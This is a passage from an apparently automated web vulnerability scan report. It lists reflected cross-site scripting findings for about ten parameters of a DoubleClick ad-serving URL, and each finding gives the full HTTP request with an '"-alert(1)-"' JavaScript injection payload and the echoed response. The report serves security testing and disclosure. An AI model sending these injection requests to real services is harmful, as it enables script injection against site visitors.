GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3e780b"-alert(1)-"3626fe1b7ba&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4620



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
279859%3B0-0%3B0%3B63094146%3B4307-300/250%3B41826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3e780b"-alert(1)-"3626fe1b7ba&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://w
...[SNIP]...

3.223. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85673"-alert(1)-"16f4b851481 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=85673"-alert(1)-"16f4b851481&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4621



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=85673"-alert(1)-"16f4b851481&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=e
...[SNIP]...

3.224. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6dcf"-alert(1)-"da186d797f1 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=e6dcf"-alert(1)-"da186d797f1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4615
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:01 GMT
Expires: Wed, 27 Apr 2011 23:22:01 GMT



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=e6dcf"-alert(1)-"da186d797f1http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094146_240279859_41826606");
var wmode = "opaque";
var bg = "same as SWF";
var dca
...[SNIP]...

3.225. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5d30"-alert(1)-"735cad3f9ff was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cna5d30"-alert(1)-"735cad3f9ff&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4622



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
/ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/k%3B240279859%3B0-0%3B0%3B63094146%3B4307-300/250%3B41826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cna5d30"-alert(1)-"735cad3f9ff&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWA
...[SNIP]...

3.226. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71ac5"-alert(1)-"60210ebd303 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US71ac5"-alert(1)-"60210ebd303&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4622



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
net/click%3Bh%3Dv8/3af6/17/153/%2a/k%3B240279859%3B0-0%3B0%3B63094146%3B4307-300/250%3B41826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US71ac5"-alert(1)-"60210ebd303&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAA
...[SNIP]...

3.227. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1bd8"-alert(1)-"fa4ab8635f9 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1c1bd8"-alert(1)-"fa4ab8635f9&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4622



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
af6/17/153/%2a/k%3B240279859%3B0-0%3B0%3B63094146%3B4307-300/250%3B41826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1c1bd8"-alert(1)-"fa4ab8635f9&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.1
...[SNIP]...

3.228. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6eae"-alert(1)-"f4709710453 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253ad6eae"-alert(1)-"f4709710453&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4622



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
ttp://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/k%3B240279859%3B0-0%3B0%3B63094146%3B4307-300/250%3B41826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253ad6eae"-alert(1)-"f4709710453&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=m
...[SNIP]...

3.229. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f42e2"-alert(1)-"a460389f3fc was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=f42e2"-alert(1)-"a460389f3fc&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4620



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
4393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=f42e2"-alert(1)-"a460389f3fc&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.htm
...[SNIP]...

3.230. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 843fc"-alert(1)-"1a58586a840 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com843fc"-alert(1)-"1a58586a840&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4620



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com843fc"-alert(1)-"1a58586a840&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-product
...[SNIP]...

3.231. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89836"-alert(1)-"f10761b3dbf was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=289836"-alert(1)-"f10761b3dbf&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4622



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/k%3B240279859%3B0-0%3B0%3B63094146%3B4307-300/250%3B41826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=289836"-alert(1)-"f10761b3dbf&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJ
...[SNIP]...

3.232. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9081e"-alert(1)-"4fbee5b54b9 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com9081e"-alert(1)-"4fbee5b54b9&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4621



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
